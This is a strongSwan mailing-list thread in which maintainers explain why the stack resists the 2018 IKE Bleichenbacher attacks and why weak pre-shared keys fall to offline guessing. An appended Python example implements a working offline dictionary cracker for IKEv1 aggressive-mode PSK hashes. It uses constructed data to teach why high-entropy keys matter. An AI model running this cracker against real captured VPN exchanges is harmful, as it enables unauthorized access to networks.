Discussion:
[strongSwan] (no subject)
Sandesh Sawant
2018-08-31 08:53:34 UTC
Hi all,

I came across the news below about a paper listing attacks on the IKE
protocol, and want to know whether the latest version of the strongSwan stack is
vulnerable to the attacks mentioned in this paper:
https://www.ei.rub.de/media/nds/veroeffentlichungen/2018/08/13/sec18-felsch.pdf
References:
https://latesthackingnews.com/2018/08/20/ipsec-vpn-connections-broken-using-20-year-old-flaw/
https://securityaffairs.co/wordpress/75352/hacking/key-reuse-ipsec-attack.html

Thanks,
Sandesh
Andreas Steffen
2018-08-31 10:20:11 UTC
Hi Sandesh,

strongSwan is not vulnerable to the Bleichenbacher oracle attack
since we did not implement the RSA encryption authentication variant
for IKEv1.

Best regards

Andreas
======================================================================
Andreas Steffen ***@strongswan.org
strongSwan - the Open Source VPN Solution! www.strongswan.org
Institute for Networked Solutions
HSR University of Applied Sciences Rapperswil
CH-8640 Rapperswil (Switzerland)
===========================================================[INS-HSR]==
Sandesh Sawant
2018-09-03 09:20:27 UTC
Hello Andreas,

Thanks for confirming that strongSwan isn't vulnerable to the mentioned
attack.

However, the report claims to have exploits for PSK and RSA signature based
authentication also... Quoting from the report abstract:

"We exploit a Bleichenbacher oracle in an IKEv1 mode, where RSA
encrypted nonces are used for authentication. Using this
exploit, we break these RSA encryption based modes,
and in addition break RSA signature based authentication
in both IKEv1 and IKEv2. Additionally, we describe
an offline dictionary attack against the PSK (Pre-Shared
Key) based IKE modes, thus covering all available authentication
mechanisms of IKE."

Can you please confirm that strongSwan isn't vulnerable to the
Bleichenbacher attack against IKEv2 signature based auth and the offline
dictionary attack mentioned for PSK based auth (irrespective of the PSK
chosen by the user)?

Thanks,
Sandesh

Graham Bartlett (grbartle)
2018-09-03 10:19:15 UTC
Hi Sandesh

The offline dictionary PSK attack isn't something new (people have known about this since the last millennium!).

In summary, if you have a 'strong' PSK you're safe. But if you have an active MiTM as described in the paper, then they can perform an offline brute force attack against your PSK, assuming they have the computing power to find it.

I wrote the following to help explain this:

https://www.linkedin.com/pulse/ike-brute-force-attack-explained-graham-bartlett/

cheers
Sandesh Sawant
2018-09-04 06:15:56 UTC
Hi Graham,

Thanks for clarifying this further.

Best,
Sandesh
Andreas Steffen
2018-09-04 06:24:22 UTC
Hi Sandesh,

RSA signature-based authentication can only be broken if the
same RSA key is being used as for RSA encryption-based authentication
and this RSA key is broken applying the Bleichenbacher oracle to
RSA encryption-based authentication.

Since strongSwan does not implement RSA encryption, the RSA key cannot
be determined using the Bleichenbacher oracle and therefore IKEv1 and
IKEv2 RSA signatures cannot be compromised.

It has always been known that IKEv1 and IKEv2 PSK-based authentication
can be broken with an offline attack if the PSK is too weak. This is why
we recommend EAP-based user authentication with IKEv2, where the server
must authenticate itself first.

PSKs with 128 bit cryptographic strength or more cannot be broken.

Best regards

Andreas
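The offline PSK attack that Graham and Andreas describe above, as an added example that is not part of the thread and not strongSwan code. It follows the IKEv1 key derivation of RFC 2409 with prf = HMAC-SHA1: SKEYID = prf(PSK, Ni_b | Nr_b) and HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b). In aggressive mode HASH_R travels in the clear, so a passive capture is enough to run the loop below; in main mode the hash is encrypted under a key derived from SKEYID, which is why the paper's variant needs an active man-in-the-middle that supplies its own DH share and can therefore test candidates against the decrypted hash. All exchange values, the wordlist and the names `Capture`, `make_capture`, `crack_psk` and `generate_psk` are constructed for this demo. The last function shows the other half of Andreas's point: a PSK with 128 bits of randomness is simply not in any wordlist.

```python
"""Offline dictionary attack against IKEv1 PSK authentication (RFC 2409).

Added example, not strongSwan code. Values below are constructed.
"""
from dataclasses import dataclass
import hashlib
import hmac
import secrets
from typing import Iterable, Optional


def prf(key: bytes, data: bytes) -> bytes:
    """IKEv1 prf: HMAC keyed with the negotiated hash algorithm (SHA-1 here)."""
    return hmac.new(key, data, hashlib.sha1).digest()


@dataclass(frozen=True)
class Capture:
    """Everything an attacker needs from one IKEv1 aggressive-mode exchange."""
    ni_b: bytes      # initiator nonce payload body
    nr_b: bytes      # responder nonce payload body
    gxi: bytes       # initiator DH public value
    gxr: bytes       # responder DH public value
    cky_i: bytes     # initiator cookie (8 bytes)
    cky_r: bytes     # responder cookie (8 bytes)
    sai_b: bytes     # initiator SA payload body
    idir_b: bytes    # responder ID payload body
    hash_r: bytes    # HASH_R as observed on the wire (cleartext in aggressive mode)


def skeyid_psk(psk: bytes, ni_b: bytes, nr_b: bytes) -> bytes:
    """RFC 2409 section 5.4: SKEYID = prf(pre-shared-key, Ni_b | Nr_b)."""
    return prf(psk, ni_b + nr_b)


def compute_hash_r(psk: bytes, c: Capture) -> bytes:
    """RFC 2409 section 5: HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    skeyid = skeyid_psk(psk, c.ni_b, c.nr_b)
    return prf(skeyid, c.gxr + c.gxi + c.cky_r + c.cky_i + c.sai_b + c.idir_b)


def crack_psk(c: Capture, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Test every candidate PSK offline: no further packets touch the gateway."""
    for psk in candidates:
        if compute_hash_r(psk, c) == c.hash_r:
            return psk
    return None


def generate_psk(bits: int = 128) -> str:
    """A PSK of the strength Andreas recommends: random, at least 128 bits."""
    return secrets.token_hex(bits // 8)


def make_capture(psk: bytes) -> Capture:
    """Constructed exchange, as a responder using `psk` would have produced it."""
    fields = dict(
        ni_b=bytes.fromhex("00112233445566778899aabbccddeeff"),
        nr_b=bytes.fromhex("ffeeddccbbaa99887766554433221100"),
        gxi=bytes(range(128)),            # stand-in for a 1024-bit DH value
        gxr=bytes(range(128, 256)),       # stand-in for a 1024-bit DH value
        cky_i=b"\x01" * 8,
        cky_r=b"\x02" * 8,
        sai_b=bytes.fromhex("00000001000000010000002c01010001"),
        idir_b=b"\x01\x00\x00\x00" + bytes([192, 0, 2, 1]),  # ID_IPV4_ADDR 192.0.2.1
    )
    partial = Capture(hash_r=b"", **fields)
    return Capture(hash_r=compute_hash_r(psk, partial), **fields)


# Constructed wordlist standing in for a real dictionary.
WORDLIST = [b"password", b"secret", b"cisco123", b"vpnkey"]


def demo() -> tuple:
    """Weak PSK falls to the wordlist; a random 128-bit PSK does not."""
    weak = make_capture(b"cisco123")
    strong = make_capture(generate_psk().encode())
    return crack_psk(weak, WORDLIST), crack_psk(strong, WORDLIST)


if __name__ == "__main__":
    found_weak, found_strong = demo()
    print("weak PSK recovered:", found_weak)
    print("128-bit PSK recovered:", found_strong)
```

The loop is cheap (two HMACs per candidate), which is the whole problem: nothing in IKEv1 PSK authentication slows the guesser down, so the only defence is entropy in the PSK itself, or moving to IKEv2 with EAP as Andreas suggests.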